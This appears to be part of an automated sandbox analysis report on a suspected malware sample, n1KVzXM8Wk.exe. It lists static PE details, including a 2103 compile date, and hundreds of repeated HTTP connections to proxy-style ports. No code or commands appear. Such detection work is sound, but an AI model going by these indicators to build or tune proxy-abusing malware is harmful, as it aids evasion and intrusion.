                    Source: n1KVzXM8Wk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: n1KVzXM8Wk.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: n1KVzXM8Wk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: n1KVzXM8Wk.exeStatic PE information: 0xFB5ACD4E [Mon Aug 20 05:46:54 2103 UTC]

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 6047
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 5436
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 58394
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 10417
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 3601
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 49922
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 11673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 5678
                    Source: unknownNetwork traffic detected: HTTP traffic on port 10417 -> 49790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 6120
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6047 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 6764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 8888
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 32770
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 12519
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 5436
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 51778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 10471
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 8899
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6764 -> 49848
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 60186
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 58394
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 3820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 11673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 59058
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49796
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 25508
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 543
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 20481
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 8083
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 31602
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 6005
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 64693
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 9002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 11946
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 9229
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 8082
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 7302
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 51778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49815
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 30464
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50287 -> 15673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 33829
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 62842
                    Source: unknownNetwork traffic detected: HTTP traffic on port 31602 -> 50095
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 82
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 5436
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 10958
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50286 -> 6745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 60186
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50134
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 8989
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50325 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 65201
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50164
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 11673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50160
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 8123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50333 -> 20481
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 25508
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 3129
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50341 -> 30000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50347 -> 39796
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 9002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 12259
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 10471
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50364 -> 6005
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 8181
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50371 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50309 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 55606
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50410 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 15673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50409 -> 6788
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50401 -> 6438
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 49397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 32770 -> 49847
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8082 -> 49996
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 26589
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 8123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50164
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50436 -> 26939
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50325
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6745 -> 50286
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50455 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 46859
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 5678
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8989 -> 50211
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 9229
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 51778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50471 -> 8081
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 37379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 49929
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 50430
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50512 -> 15673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 58394
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 19050
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 9002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 5784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 50236
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50513 -> 20481
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 60186
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 32284
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 8899
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 49397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 25508
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6788 -> 50409
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50500
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 62842
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 82
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 6005
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50475 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50336 -> 9002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 49314
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50535 -> 26589
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 18072
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50309 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 55606
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 30001
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50284 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 5678
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 10820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 51350
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 35010
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 16379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50540 -> 15673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 15460
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 56755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50541 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 32284
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50542 -> 5678
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 49397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50261 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 32148
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8899 -> 49817
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 9002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 9229
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50545 -> 20481
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 5436
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50328 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50500
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50515 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 26589
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50320 -> 2419
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50202
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50550 -> 6005
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50538 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50546 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50520 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 11176
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50543 -> 10471
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 6984
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50561 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50411 -> 35860
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50240
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50566 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50548 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50547 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50077
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50450 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50336
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50176
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 32284
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 60186
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50561 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 6984
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49807
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50309 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 62842
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 49397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 82
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 55606
                    Source: unknownNetwork traffic detected: HTTP traffic on port 543 -> 49964
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 58394
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 6984
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 9229
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 32284
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50574 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50469 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50571 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50583 -> 34090
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50395 -> 39873
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50585 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 60870
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50496 -> 50578
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 26589
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50499 -> 10919
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50568 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50490 -> 4153
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50526 -> 37901
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50517 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50454 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50487 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50220 -> 48359
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 3663
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 3312
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50544 -> 15311
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50557 -> 64608
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 62691
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 42823
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 5678
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 999
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 9090
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50563 -> 35010
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50584 -> 35087
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 9603
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 56862
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 51025
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 53672
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50371
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 56238
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 53281
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 36477
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50590 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9090 -> 49829
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50593 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 36946
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 64305
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 8100
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50600 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50594 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50332 -> 59810
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50598 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50597 -> 10471
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50605 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50599 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50608 -> 10919
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50612 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50613 -> 15311
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50611 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 5436
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 12259
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 6984
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50615 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50636 -> 9898
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 8089
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 46859
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 49397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50309 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50638 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50641 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50650 -> 14287
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50043
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50434 -> 26789
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50626 -> 543
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50623 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50667 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50670 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50671 -> 10919
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50673 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50457 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50682 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 37379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 15311
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 5784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50690 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50694 -> 56225
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50485 -> 8085
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50696 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50704 -> 9733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50711 -> 42042
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50720 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50592 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 64556
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50781 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50798 -> 25295
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50817 -> 49687
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 18072
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 49314
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50838 -> 44499
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 62842
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50723 -> 8888
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50696
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50709 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50623
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50842 -> 10919
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50857 -> 16379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50725 -> 8888
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50865 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50868 -> 15311
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50882 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50781
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50183
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 15460
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50776 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50871 -> 17179
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 16379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50261 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50783 -> 28134
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 8585
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50906 -> 4153
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50934 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 32148
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50694 -> 56225
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50965 -> 32520
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50879 -> 9091
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50737 -> 8899
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50595 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50898 -> 9002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50626 -> 543
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50704 -> 9733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50320 -> 2419
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 82
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50919 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51009 -> 34409
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8585 -> 50932
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51015 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51012 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51040 -> 53397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51054 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51122 -> 38721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51082 -> 27829
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50798 -> 25295
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50711 -> 42042
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 64556
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51039 -> 5000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51211 -> 5432
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51220 -> 53935
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51107 -> 63135
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51123 -> 33466
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50961 -> 42369
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51208 -> 46286
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51138 -> 6467
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51151 -> 6161
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51261 -> 38338
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51265 -> 8380
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51175 -> 45620
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51275 -> 46097
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51296 -> 32100
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51202 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50689 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51324 -> 17970
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 11176
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50817 -> 49687
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51212 -> 3129
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51231 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51250 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51253 -> 1772
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50994 -> 9002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 51211
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50857 -> 16379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51266 -> 35557
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50633 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51098 -> 8037
